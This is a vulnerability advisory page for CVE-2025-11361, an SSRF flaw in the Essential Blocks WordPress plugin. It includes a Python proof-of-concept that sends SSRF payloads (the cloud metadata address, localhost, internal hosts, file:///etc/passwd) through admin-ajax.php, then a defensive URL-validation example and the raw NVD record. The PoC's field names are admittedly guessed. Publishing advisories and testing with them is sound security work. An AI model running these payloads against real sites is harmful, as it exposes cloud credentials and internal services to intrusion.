Security Vulnerability Report
CVE-2025-11361 CVSS 6.4 MEDIUM

CVE-2025-11361

Published: 2025-10-18 05:15:34
Last Modified: 2026-04-15 00:35:42

Description

The Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.7.1 via the eb_save_ai_generated_image function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is recorded in the NVD entry. Affected version range as reported by the advisory sources (the two ranges below the NVD note in the original listing, "< 5.7.2" and "<= 5.7.1", describe the same set of releases):

Gutenberg Essential Blocks <= 5.7.1 (all releases before 5.7.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11361 PoC - Essential Blocks plugin SSRF
# Vulnerable endpoint: /wp-admin/admin-ajax.php
# Vulnerable function: eb_save_ai_generated_image
# File: includes/Admin/Admin.php (line 865 of the 5.7.0 tag)
#
# The AJAX action name, the POST field that carries the URL and the nonce
# field are NOT confirmed by the advisory: confirm them against the plugin
# source (trac link at the bottom) and adjust the constants below.

import sys

import requests

TARGET_URL = "http://target-wordpress-site.com"  # no trailing slash

# Option 1: cookies copied from an existing Author-level browser session.
# The real cookie names carry a per-site hash, e.g. "wordpress_logged_in_<md5>".
COOKIES = {
    "wordpress_logged_in_[hash]": "your_auth_cookie",
    "wordpress_sec_[hash]": "your_sec_cookie",
}

# Option 2: log in with Author-level credentials (leave empty to use COOKIES).
USERNAME = ""
PASSWORD = ""

AJAX_ACTION = "eb_save_ai_generated_image"  # assumed: handler registered under its own name
URL_PARAM = "image_url"                       # assumed: POST field carrying the image URL
NONCE_FIELD = "nonce"                         # assumed: name of the nonce field
NONCE_VALUE = "valid_nonce_value"             # take it from the editor page's localized JS data

# SSRF payloads for the eb_save_ai_generated_image function
SSRF_PAYLOADS = [
    "http://169.254.169.254/latest/meta-data/",  # cloud instance metadata service
    "http://127.0.0.1:8080/admin",               # service bound to localhost only
    "http://192.168.1.1/",                       # internal network device
    # file:// is only useful if the handler fetches with something other than the
    # WordPress HTTP API, which is limited to http/https; the advisory does not say
    # which fetch routine the handler uses.
    "file:///etc/passwd",
    "http://internal-db-service:3306/",          # internal hostname on a non-HTTP port
]


def login(session, target_url, username, password):
    """Authenticate through wp-login.php; WordPress sets the auth cookies on the session."""
    resp = session.post(
        f"{target_url}/wp-login.php",
        data={"log": username, "pwd": password, "wp-submit": "Log In",
              "redirect_to": f"{target_url}/wp-admin/", "testcookie": "1"},
        allow_redirects=False, timeout=15,
    )
    # A successful login answers with a redirect and sets wordpress_logged_in_*
    if not any(name.startswith("wordpress_logged_in_") for name in session.cookies.keys()):
        sys.exit(f"[-] Login failed (HTTP {resp.status_code}); check the credentials")


def exploit_ssrf(session, target_url, payload_url):
    """
    Trigger the SSRF: the handler fetches the caller-supplied URL server-side
    without validating its scheme or destination.
    """
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    data = {"action": AJAX_ACTION, URL_PARAM: payload_url, NONCE_FIELD: NONCE_VALUE}
    headers = {"X-Requested-With": "XMLHttpRequest"}  # requests sets the form Content-Type itself
    response = session.post(endpoint, data=data, headers=headers, timeout=30)
    print(f"[*] Payload: {payload_url}")
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text[:500]}")
    return response


if __name__ == "__main__":
    session = requests.Session()
    if USERNAME and PASSWORD:
        login(session, TARGET_URL, USERNAME, PASSWORD)
    else:
        session.cookies.update(COOKIES)

    # A bare "0" from admin-ajax.php means the action name is not registered and
    # "-1" means the nonce check failed; neither means the target is patched.
    # Whether the fetched content is echoed back depends on the handler. If it is
    # not, confirm the outbound request first with a URL pointing at a host you
    # control, then move on to internal targets.
    for payload in SSRF_PAYLOADS:
        print("\n" + "=" * 60)
        exploit_ssrf(session, TARGET_URL, payload)
        print("=" * 60)

# Note: confirm the actual AJAX action name, URL parameter and nonce field
# against the plugin source at:
# https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Admin/Admin.php#L865
```
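For comparison, the destination check a handler like eb_save_ai_generated_image needs before fetching a caller-supplied URL. This is an added example written for this page, not the plugin's code and not the fix shipped in 5.7.2. In a WordPress plugin the same check is available as wp_http_validate_url(), which wp_safe_remote_get() applies automatically; the Python below spells the logic out so it can be run against the payload list from the PoC above. The hostname resolver is injectable, and the DNS table and host names in the block are constructed so that it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


class UnsafeURL(ValueError):
    """The caller-supplied URL must not be fetched from the server."""


def _is_public(ip):
    """True only for globally routable unicast addresses.

    Rejects loopback, RFC 1918, link-local (which covers the 169.254.169.254
    cloud metadata address), multicast, reserved and unspecified addresses,
    and the IPv4-mapped IPv6 form (::ffff:a.b.c.d) of any of those.
    """
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_all(host):
    """Default resolver: every address the system resolver returns for host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_fetch_target(url, resolve=resolve_all):
    """Return (host, pinned_ip) if url is safe to fetch server-side, else raise UnsafeURL.

    The caller must connect to pinned_ip (sending Host: host) and must not follow
    redirects automatically; otherwise DNS rebinding between check and fetch, or
    a 302 to an internal address, bypasses this check.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    if parts.username or parts.password:
        raise UnsafeURL("credentials embedded in URL")
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError as exc:
        raise UnsafeURL(f"malformed port in {url!r}") from exc
    if port not in ALLOWED_PORTS:
        raise UnsafeURL(f"port not allowed: {port}")
    try:                                  # IP literal: no DNS lookup needed
        addresses = [ipaddress.ip_address(host)]
    except ValueError:                    # hostname: check every address it maps to
        try:
            addresses = [ipaddress.ip_address(a) for a in resolve(host)]
        except (OSError, ValueError) as exc:
            raise UnsafeURL(f"cannot resolve {host!r}: {exc}") from exc
    if not addresses:
        raise UnsafeURL(f"no addresses for {host!r}")
    for ip in addresses:
        if not _is_public(ip):
            raise UnsafeURL(f"{host!r} resolves to non-public address {ip}")
    return host, str(addresses[0])


def rejection_reason(url, resolve=resolve_all):
    """None if the URL passes the check, otherwise the reason it was rejected."""
    try:
        validate_fetch_target(url, resolve)
        return None
    except UnsafeURL as exc:
        return str(exc)


# Constructed DNS table so the demonstration runs offline; the names and
# answers are made up, and 8.8.8.8 merely stands in for any public address.
FAKE_DNS = {
    "internal-db-service": ["10.0.0.5"],
    "intranet.example": ["10.20.0.8"],
    "images.example": ["8.8.8.8"],
    "rebind.example": ["8.8.8.8", "127.0.0.1"],  # mixed answer: reject the whole name
}


def fake_resolve(host):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"no constructed DNS entry for {host!r}")
    return FAKE_DNS[host]


if __name__ == "__main__":
    # The PoC's payloads plus a few cases that list does not cover.
    for candidate in [
        "http://169.254.169.254/latest/meta-data/", "http://127.0.0.1:8080/admin",
        "http://192.168.1.1/", "file:///etc/passwd", "http://internal-db-service:3306/",
        "http://intranet.example/logo.png", "http://[::ffff:127.0.0.1]/",
        "http://rebind.example/", "https://images.example/generated.png",
    ]:
        reason = rejection_reason(candidate, fake_resolve)
        print(f"{'ALLOW ' if reason is None else 'REJECT'} {candidate}  {reason or ''}")
```

Every payload from the PoC is rejected before any request is made; only the constructed public image host passes, and the returned pinned address is what the fetch must connect to. When relying on WordPress core's wp_http_validate_url() instead, verify in the installed version that it rejects 169.254.169.254, which lies outside the RFC 1918 ranges most blocklists are written around.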

References

https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Admin/Admin.php#L865
https://research.cleantalk.org/cve-2025-11361/
https://www.wordfence.com/threat-intel/vulnerabilities/id/d4b06b93-6b15-4b1f-bdd9-080618591bdc?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11361", "sourceIdentifier": "[email protected]", "published": "2025-10-18T05:15:33.607", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.7.1 via the eb_save_ai_generated_image function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/essential-blocks/tags/5.7.0/includes/Admin/Admin.php#L865", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-11361/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d4b06b93-6b15-4b1f-bdd9-080618591bdc?source=cve", "source": "[email protected]"}]}}